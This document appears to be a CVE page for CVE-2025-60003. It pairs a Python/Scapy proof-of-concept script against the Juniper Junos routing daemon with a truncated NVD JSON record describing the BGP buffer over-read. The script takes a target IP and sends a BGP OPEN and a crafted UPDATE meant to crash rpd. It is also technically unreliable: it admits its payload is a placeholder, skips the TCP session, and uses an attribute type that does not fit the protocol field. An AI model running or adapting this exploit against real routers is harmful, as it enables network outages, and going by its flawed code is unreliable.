CVE-2025-60003

#!/usr/bin/env python3 # CVE-2025-60003 PoC - Juniper Junos OS rpd Buffer Over-read # This PoC demonstrates sending a crafted BGP UPDATE with malicious optional transitive attributes # Note: This is for authorized security testing only from scapy.all import * from scapy.contrib.bgp import * import socket import struct def craft_bgp_open(): """Craft BGP OPEN message for session establishment""" bgp_open = BGPOpen() bgp_open.version = 4 bgp_open.my_as = 65000 bgp_open.hold_time = 90 bgp_open.bgp_id = IPAddr('192.168.1.100') # Add 4-byte AS capability (may be omitted to trigger vulnerability) cap_4byte = BGPCapability() cap_4byte.code = 65 # 4-byte AS number cap_4byte.value = struct.pack('!H', 65000) bgp_open.capabilities = [cap_4byte] return bgp_open def craft_malicious_bgp_update(): """Craft malicious BGP UPDATE with crafted optional transitive attributes This triggers buffer over-read in rpd when processing attributes """ bgp_update = BGPUpdate() # Withdrawn routes bgp_update.withdrawn_routes = [] # Path attributes with crafted optional transitive attribute # This specific attribute construction can trigger the buffer over-read path_attrs = [] # ORIGIN attribute (well-known transitive) origin_attr = BGPPathAttr(flags=0x40, type=1, attr=[BGPAttrOrigin(0)]) path_attrs.append(origin_attr) # AS_PATH attribute (well-known transitive) as_path = BGPAttrASPath(paths=[[(1, [65001, 65002])]]) as_path_attr = BGPPathAttr(flags=0x40, type=2, attr=[as_path]) path_attrs.append(as_path_attr) # NEXT_HOP attribute (well-known transitive) next_hop = BGPAttrNextHop('10.0.0.1') next_hop_attr = BGPPathAttr(flags=0x40, type=3, attr=[next_hop]) path_attrs.append(next_hop_attr) # Crafted optional transitive attribute that triggers buffer over-read # This is a placeholder - actual exploitation requires specific byte patterns malicious_attr_data = b'\xaa\xbb\xcc\xdd' * 10 # Malicious pattern # Wrap in BGPPathAttr with optional transitive flag (flag=0x80) crafted_attr = BGPPathAttr() crafted_attr.flags = 0x80 # Optional + Transitive crafted_attr.type = 999 # Vendor-specific attribute type crafted_attr.attr = malicious_attr_data path_attrs.append(crafted_attr) bgp_update.path_attributes = path_attrs # NLRI (Network Layer Reachability Information) bgp_update.nlri = [IPNetwork('10.100.0.0/24')] return bgp_update def send_bgp_poc(target_ip, asn=65000): """Send crafted BGP messages to trigger vulnerability""" print(f"[*] Starting CVE-2025-60003 PoC against {target_ip}") print(f"[*] Local ASN: {asn}") # Step 1: Send BGP OPEN message print("[*] Sending BGP OPEN message...") open_pkt = IP(dst=target_ip) / TCP(dport=179, sport=12345) / BGPL4Session() / craft_bgp_open() send(open_pkt, verbose=0) # Step 2: Send crafted BGP UPDATE with malicious attributes print("[*] Sending crafted BGP UPDATE with malicious optional transitive attributes...") update_pkt = IP(dst=target_ip) / TCP(dport=179, sport=12345) / BGPL4Session() / craft_malicious_bgp_update() send(update_pkt, verbose=0) print("[+] Packets sent. Target rpd may crash if vulnerable.") print("[!] Note: Actual exploitation requires specific attribute construction based on target version.") if __name__ == '__main__': import sys if len(sys.argv) < 2: print("Usage: python cve-2025-60003-poc.py <target_ip>") sys.exit(1) send_bgp_poc(sys.argv[1])

{"cve": {"id": "CVE-2025-60003", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:03.590", "lastModified": "2026-01-23T19:39:25.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Buffer Over-read vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS).\n\nWhen an affected device receives a BGP update with a set of specific optional transitive attributes over an established peering session, rpd will crash and restart when attempting to advertise the received information to another peer.\nThis issue can only happen if one or both of the BGP peers of the receiving session are non-4-byte-AS capable as determined from the advertised capabilities during BGP session establishment. Junos OS and Junos OS Evolved default behavior is 4-byte-AS capable unless this has been specifically disabled by configuring:\n\n[ protocols bgp ... disable-4byte-as ]\n\n\nEstablished BGP sessions can be checked by executing:\n\nshow bgp neighbor <IP address> | match \"4 byte AS\"\n\n\nThis issue affects:\n\nJunos OS: \n\n * all versions before 22.4R3-S8,\n * 23.2 versions before 23.2R2-S5,\n * 23.4 versions before 23.4R2-S6,\n * 24.2 versions before 24.2R2-S2,\n * 24.4 versions before 24.4R2;\n\n\nJunos OS Evolved: \n\n * all versions before 22.4R3-S8-EVO,\n * 23.2 versions before 23.2R2-S5-EVO,\n * 23.4 versions before 23.4R2-S6-EVO,\n * 24.2 versions before 24.2R2-S2-EVO,\n * 24.4 versions before 24.4R2-EVO."}, {"lang": "es", "value": "Una vulnerabilidad de lectura excesiva de búfer en el demonio del protocolo de enrutamiento (rpd) de Juniper Networks Junos OS y Junos OS Evolved permite a un atacante no autenticado y basado en red causar una Denegación de Servicio (DoS).\n\nCuando un dispositivo afectado recibe una actualización BGP con un conjunto de atributos transitivos opcionales específicos a través de una sesión de emparejamiento establecida, rpd fallará y se reiniciará al intentar anunciar la información recibida a otro par.\nEste problema solo puede ocurrir si uno o ambos pares BGP de la sesión receptora no son compatibles con AS de 4 bytes, según lo determinado por las capacidades anunciadas durante el establecimiento de la sesión BGP. El comportamiento predeterminado de Junos OS y Junos OS Evolved es compatible con AS de 4 bytes, a menos que esto se haya deshabilitado específicamente configurando:\n\n[ protocols bgp ... disable-4byte-as ]\n\nLas sesiones BGP establecidas se pueden verificar ejecutando:\n\nshow bgp neighbor | match '4 byte AS'\n\nEste problema afecta:\n\nJunos OS:\n\n * todas las versiones anteriores a 22.4R3-S8,\n * versiones 23.2 anteriores a 23.2R2-S5,\n * versiones 23.4 anteriores a 23.4R2-S6,\n * versiones 24.2 anteriores a 24.2R2-S2,\n * versiones 24.4 anteriores a 24.4R2;\n\nJunos OS Evolved:\n\n * todas las versiones anteriores a 22.4R3-S8-EVO,\n * versiones 23.2 anteriores a 23.2R2-S5-EVO,\n * versiones 23.4 anteriores a 23.4R2-S6-EVO,\n * versiones 24.2 anteriores a 24.2R2-S2-EVO,\n * versiones 24.4 anteriores a 24.4R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexi ... (truncated)